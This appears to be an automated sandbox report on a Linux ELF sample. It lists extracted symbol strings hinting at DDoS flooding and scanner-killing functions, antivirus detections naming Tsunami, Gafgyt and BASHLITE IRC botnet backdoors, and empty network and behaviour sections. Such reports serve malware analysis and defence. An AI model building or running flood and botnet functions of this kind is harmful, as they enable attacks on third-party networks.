table_init
_errno
fd_ctrl
_stdio_openlist_del_lock
__GI_inet_aton
_PING
hex_flood
fgets_unlocked
__GI_bind
_exit
strspn
__libc_recv
rand_alpha_str
exePath
__libc_creat
strlen
lseek64
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
clock
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
fputc_unlocked
fcntl
flooders
__GI_fdopen
__GI_atoi
command_ucm
fseeko64
__GI_sprintf
ucm_scanner_kill
__ctype_tolower
wcrtomb
__GI_getsockname
close
__libc_connect
checksum_tcp_udp
__GI_strlen
vfprintf
strpbrk
_load_inttype
raise
sigprocmask
__fputc_unlocked
getsockname
!"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~
cxyzw

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean DrWeb Linux.BackDoor.Tsunami.1211 MicroWorld-eScan Gen:Variant.Backdoor.Linux.Tsunami.1
CMC Clean CAT-QuickHeal Clean ALYac Backdoor.Linux.Tsunami
Malwarebytes Clean VIPRE Clean Sangfor Malware
K7AntiVirus Clean K7GW Clean BitDefenderTheta Gen:NN.Mirai.34106
Cyren ELF/Backdoor.BQWR- Symantec Trojan.Gen.2 ESET-NOD32 a variant of Linux/IRCBot.P
TrendMicro-HouseCall Backdoor.Linux.BASHLITE.SMJC11 Avast ELF:Gafgyt-KR [Trj] Kaspersky HEUR:Backdoor.Linux.Tsunami.ci
BitDefender Gen:Variant.Backdoor.Linux.Tsunami.1 NANO-Antivirus Clean ViRobot Clean
AegisLab Trojan.Linux.Tsunami.m!c Tencent Trojan.Linux.Tsunami.bp Ad-Aware Gen:Variant.Backdoor.Linux.Tsunami.1
Sophos Mal/Generic-S Comodo [email protected]#27zsk2swq5vbs F-Secure Malware.LINUX/IRCBot.xqfhe
Baidu Clean Zillya Clean TrendMicro Backdoor.Linux.BASHLITE.SMJC11
McAfee-GW-Edition Linux/HeliBot!7040A2CE4E8E FireEye Gen:Variant.Backdoor.Linux.Tsunami.1 Emsisoft Gen:Variant.Backdoor.Linux.Tsunami.1 (B)
Ikarus Trojan.Linux.Gafgyt F-Prot Clean Jiangmin Clean
Antiy-AVL Trojan[Backdoor]/Linux.Tsunami.ci Kingsoft Clean Microsoft Trojan:Win32/Skeeyah.A!rfn
Arcabit Trojan.Backdoor.Linux.Tsunami.1 SUPERAntiSpyware Clean ZoneAlarm HEUR:Backdoor.Linux.Tsunami.ci
Avast-Mobile ELF:Gafgyt-KS [Trj] GData Gen:Variant.Backdoor.Linux.Tsunami.1 TACHYON Clean
AhnLab-V3 Linux/Gafgyt.Gen44 McAfee Linux/HeliBot!7040A2CE4E8E MAX malware (ai score=100)
VBA32 Clean Zoner Clean Rising Backdoor.Tsunami!8.E80 (TFE:14:Dta0bK8g7TF)
Yandex Clean SentinelOne DFI - Malicious ELF MaxSecure Clean
Fortinet ELF/Gafgyt.BJ!tr AVG ELF:Gafgyt-KR [Trj] Panda Clean
Qihoo-360 Linux/Backdoor.c7a
Sorry! No behavior.

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 5.962000000000001 seconds )

  • 5.347 Suricata
  • 0.438 VirusTotal
  • 0.081 CAPE
  • 0.073 TargetInfo
  • 0.014 AnalysisInfo
  • 0.004 Debug
  • 0.003 Strings
  • 0.001 BehaviorAnalysis
  • 0.001 NetworkAnalysis

Signatures ( 0.04800000000000001 seconds )

  • 0.01 ransomware_files
  • 0.006 antiav_detectreg
  • 0.005 ransomware_extensions
  • 0.004 antiav_detectfile
  • 0.003 persistence_autorun
  • 0.003 infostealer_bitcoin
  • 0.003 infostealer_ftp
  • 0.002 infostealer_im
  • 0.002 infostealer_mail
  • 0.001 kibex_behavior
  • 0.001 tinba_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 geodo_banking_trojan
  • 0.001 browser_security
  • 0.001 disables_browser_warn
  • 0.001 masquerade_process_name
  • 0.001 revil_mutexes

Reporting ( 0.884 seconds )

  • 0.842 BinGraph
  • 0.042 JsonDump